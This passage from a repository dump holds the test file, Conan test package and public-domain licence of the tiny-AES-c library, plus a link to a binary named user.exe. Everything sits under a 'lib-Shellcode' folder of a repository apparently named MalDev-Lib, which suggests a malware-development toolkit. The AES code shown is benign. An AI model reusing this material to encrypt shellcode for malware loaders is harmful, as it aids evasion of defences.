0xc8, 0x1c, 0x46, 0xa3, 0x5c, 0xe4, 0x11, 0xe5, 0xfb, 0xc1, 0x19, 0x1a, 0x0a, 0x52, 0xef, 211 | 0xf6, 0x9f, 0x24, 0x45, 0xdf, 0x4f, 0x9b, 0x17, 0xad, 0x2b, 0x41, 0x7b, 0xe6, 0x6c, 0x37, 0x10 }; 212 | struct AES_ctx ctx; 213 | 214 | AES_init_ctx_iv(&ctx, key, iv); 215 | AES_CBC_encrypt_buffer(&ctx, in, 64); 216 | 217 | printf("CBC encrypt: "); 218 | 219 | if (0 == memcmp((char*) out, (char*) in, 64)) { 220 | printf("SUCCESS!\n"); 221 | return(0); 222 | } else { 223 | printf("FAILURE!\n"); 224 | return(1); 225 | } 226 | } 227 | 228 | static int test_xcrypt_ctr(const char* xcrypt); 229 | static int test_encrypt_ctr(void) 230 | { 231 | return test_xcrypt_ctr("encrypt"); 232 | } 233 | 234 | static int test_decrypt_ctr(void) 235 | { 236 | return test_xcrypt_ctr("decrypt"); 237 | } 238 | 239 | static int test_xcrypt_ctr(const char* xcrypt) 240 | { 241 | #if defined(AES256) 242 | uint8_t key[32] = { 0x60, 0x3d, 0xeb, 0x10, 0x15, 0xca, 0x71, 0xbe, 0x2b, 0x73, 0xae, 0xf0, 0x85, 0x7d, 0x77, 0x81, 243 | 0x1f, 0x35, 0x2c, 0x07, 0x3b, 0x61, 0x08, 0xd7, 0x2d, 0x98, 0x10, 0xa3, 0x09, 0x14, 0xdf, 0xf4 }; 244 | uint8_t in[64] = { 0x60, 0x1e, 0xc3, 0x13, 0x77, 0x57, 0x89, 0xa5, 0xb7, 0xa7, 0xf5, 0x04, 0xbb, 0xf3, 0xd2, 0x28, 245 | 0xf4, 0x43, 0xe3, 0xca, 0x4d, 0x62, 0xb5, 0x9a, 0xca, 0x84, 0xe9, 0x90, 0xca, 0xca, 0xf5, 0xc5, 246 | 0x2b, 0x09, 0x30, 0xda, 0xa2, 0x3d, 0xe9, 0x4c, 0xe8, 0x70, 0x17, 0xba, 0x2d, 0x84, 0x98, 0x8d, 247 | 0xdf, 0xc9, 0xc5, 0x8d, 0xb6, 0x7a, 0xad, 0xa6, 0x13, 0xc2, 0xdd, 0x08, 0x45, 0x79, 0x41, 0xa6 }; 248 | #elif defined(AES192) 249 | uint8_t key[24] = { 0x8e, 0x73, 0xb0, 0xf7, 0xda, 0x0e, 0x64, 0x52, 0xc8, 0x10, 0xf3, 0x2b, 0x80, 0x90, 0x79, 0xe5, 250 | 0x62, 0xf8, 0xea, 0xd2, 0x52, 0x2c, 0x6b, 0x7b }; 251 | uint8_t in[64] = { 0x1a, 0xbc, 0x93, 0x24, 0x17, 0x52, 0x1c, 0xa2, 0x4f, 0x2b, 0x04, 0x59, 0xfe, 0x7e, 0x6e, 0x0b, 252 | 0x09, 0x03, 0x39, 0xec, 0x0a, 0xa6, 0xfa, 0xef, 0xd5, 0xcc, 0xc2, 0xc6, 0xf4, 0xce, 0x8e, 0x94, 253 | 0x1e, 0x36, 0xb2, 0x6b, 0xd1, 0xeb, 0xc6, 0x70, 0xd1, 0xbd, 0x1d, 0x66, 0x56, 0x20, 0xab, 0xf7, 254 | 0x4f, 0x78, 0xa7, 0xf6, 0xd2, 0x98, 0x09, 0x58, 0x5a, 0x97, 0xda, 0xec, 0x58, 0xc6, 0xb0, 0x50 }; 255 | #elif defined(AES128) 256 | uint8_t key[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c }; 257 | uint8_t in[64] = { 0x87, 0x4d, 0x61, 0x91, 0xb6, 0x20, 0xe3, 0x26, 0x1b, 0xef, 0x68, 0x64, 0x99, 0x0d, 0xb6, 0xce, 258 | 0x98, 0x06, 0xf6, 0x6b, 0x79, 0x70, 0xfd, 0xff, 0x86, 0x17, 0x18, 0x7b, 0xb9, 0xff, 0xfd, 0xff, 259 | 0x5a, 0xe4, 0xdf, 0x3e, 0xdb, 0xd5, 0xd3, 0x5e, 0x5b, 0x4f, 0x09, 0x02, 0x0d, 0xb0, 0x3e, 0xab, 260 | 0x1e, 0x03, 0x1d, 0xda, 0x2f, 0xbe, 0x03, 0xd1, 0x79, 0x21, 0x70, 0xa0, 0xf3, 0x00, 0x9c, 0xee }; 261 | #endif 262 | uint8_t iv[16] = { 0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff }; 263 | uint8_t out[64] = { 0x6b, 0xc1, 0xbe, 0xe2, 0x2e, 0x40, 0x9f, 0x96, 0xe9, 0x3d, 0x7e, 0x11, 0x73, 0x93, 0x17, 0x2a, 264 | 0xae, 0x2d, 0x8a, 0x57, 0x1e, 0x03, 0xac, 0x9c, 0x9e, 0xb7, 0x6f, 0xac, 0x45, 0xaf, 0x8e, 0x51, 265 | 0x30, 0xc8, 0x1c, 0x46, 0xa3, 0x5c, 0xe4, 0x11, 0xe5, 0xfb, 0xc1, 0x19, 0x1a, 0x0a, 0x52, 0xef, 266 | 0xf6, 0x9f, 0x24, 0x45, 0xdf, 0x4f, 0x9b, 0x17, 0xad, 0x2b, 0x41, 0x7b, 0xe6, 0x6c, 0x37, 0x10 }; 267 | struct AES_ctx ctx; 268 | 269 | AES_init_ctx_iv(&ctx, key, iv); 270 | AES_CTR_xcrypt_buffer(&ctx, in, 64); 271 | 272 | printf("CTR %s: ", xcrypt); 273 | 274 | if (0 == memcmp((char *) out, (char *) in, 64)) { 275 | printf("SUCCESS!\n"); 276 | return(0); 277 | } else { 278 | printf("FAILURE!\n"); 279 | return(1); 280 | } 281 | } 282 | 283 | 284 | static int test_decrypt_ecb(void) 285 | { 286 | #if defined(AES256) 287 | uint8_t key[] = { 0x60, 0x3d, 0xeb, 0x10, 0x15, 0xca, 0x71, 0xbe, 0x2b, 0x73, 0xae, 0xf0, 0x85, 0x7d, 0x77, 0x81, 288 | 0x1f, 0x35, 0x2c, 0x07, 0x3b, 0x61, 0x08, 0xd7, 0x2d, 0x98, 0x10, 0xa3, 0x09, 0x14, 0xdf, 0xf4 }; 289 | uint8_t in[] = { 0xf3, 0xee, 0xd1, 0xbd, 0xb5, 0xd2, 0xa0, 0x3c, 0x06, 0x4b, 0x5a, 0x7e, 0x3d, 0xb1, 0x81, 0xf8 }; 290 | #elif defined(AES192) 291 | uint8_t key[] = { 0x8e, 0x73, 0xb0, 0xf7, 0xda, 0x0e, 0x64, 0x52, 0xc8, 0x10, 0xf3, 0x2b, 0x80, 0x90, 0x79, 0xe5, 292 | 0x62, 0xf8, 0xea, 0xd2, 0x52, 0x2c, 0x6b, 0x7b }; 293 | uint8_t in[] = { 0xbd, 0x33, 0x4f, 0x1d, 0x6e, 0x45, 0xf2, 0x5f, 0xf7, 0x12, 0xa2, 0x14, 0x57, 0x1f, 0xa5, 0xcc }; 294 | #elif defined(AES128) 295 | uint8_t key[] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c }; 296 | uint8_t in[] = { 0x3a, 0xd7, 0x7b, 0xb4, 0x0d, 0x7a, 0x36, 0x60, 0xa8, 0x9e, 0xca, 0xf3, 0x24, 0x66, 0xef, 0x97 }; 297 | #endif 298 | 299 | uint8_t out[] = { 0x6b, 0xc1, 0xbe, 0xe2, 0x2e, 0x40, 0x9f, 0x96, 0xe9, 0x3d, 0x7e, 0x11, 0x73, 0x93, 0x17, 0x2a }; 300 | struct AES_ctx ctx; 301 | 302 | AES_init_ctx(&ctx, key); 303 | AES_ECB_decrypt(&ctx, in); 304 | 305 | printf("ECB decrypt: "); 306 | 307 | if (0 == memcmp((char*) out, (char*) in, 16)) { 308 | printf("SUCCESS!\n"); 309 | return(0); 310 | } else { 311 | printf("FAILURE!\n"); 312 | return(1); 313 | } 314 | } 315 | 316 | 317 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/test.cpp: -------------------------------------------------------------------------------- 1 | #include "aes.hpp" 2 | #include "test.c" 3 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/test_package/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 2.8.12) 2 | project(TinyAesPackageTest C CXX) 3 | 4 | include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake) 5 | conan_basic_setup() 6 | 7 | add_executable(example ../test.c) 8 | add_executable(example_cpp ../test.cpp) 9 | 10 | target_link_libraries(example ${CONAN_LIBS}) 11 | target_link_libraries(example_cpp ${CONAN_LIBS}) -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/test_package/conanfile.py: -------------------------------------------------------------------------------- 1 | from conans import ConanFile, CMake, tools 2 | import os 3 | 4 | 5 | class TinyAesCTestConan(ConanFile): 6 | settings = "os", "compiler", "build_type", "arch" 7 | generators = "cmake" 8 | 9 | def build(self): 10 | cmake = CMake(self) 11 | cmake.configure() 12 | cmake.build() 13 | 14 | def test(self): 15 | if not tools.cross_building(self.settings): 16 | os.chdir("bin") 17 | self.run(".%sexample" % os.sep) 18 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/unlicense.txt: -------------------------------------------------------------------------------- 1 | This is free and unencumbered software released into the public domain. 2 | 3 | Anyone is free to copy, modify, publish, use, compile, sell, or 4 | distribute this software, either in source code form or as a compiled 5 | binary, for any purpose, commercial or non-commercial, and by any 6 | means. 7 | 8 | In jurisdictions that recognize copyright laws, the author or authors 9 | of this software dedicate any and all copyright interest in the 10 | software to the public domain. We make this dedication for the benefit 11 | of the public at large and to the detriment of our heirs and 12 | successors. We intend this dedication to be an overt act of 13 | relinquishment in perpetuity of all present and future rights to this 14 | software under copyright law. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR 20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | OTHER DEALINGS IN THE SOFTWARE. 23 | 24 | For more information, please refer to 25 | -------------------------------------------------------------------------------- /lib-Shellcode/user.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/MalDev-Lib/4741f706562ba3519dfb451053a57bfc3300974a/lib-Shellcode/user.exe --------------------------------------------------------------------------------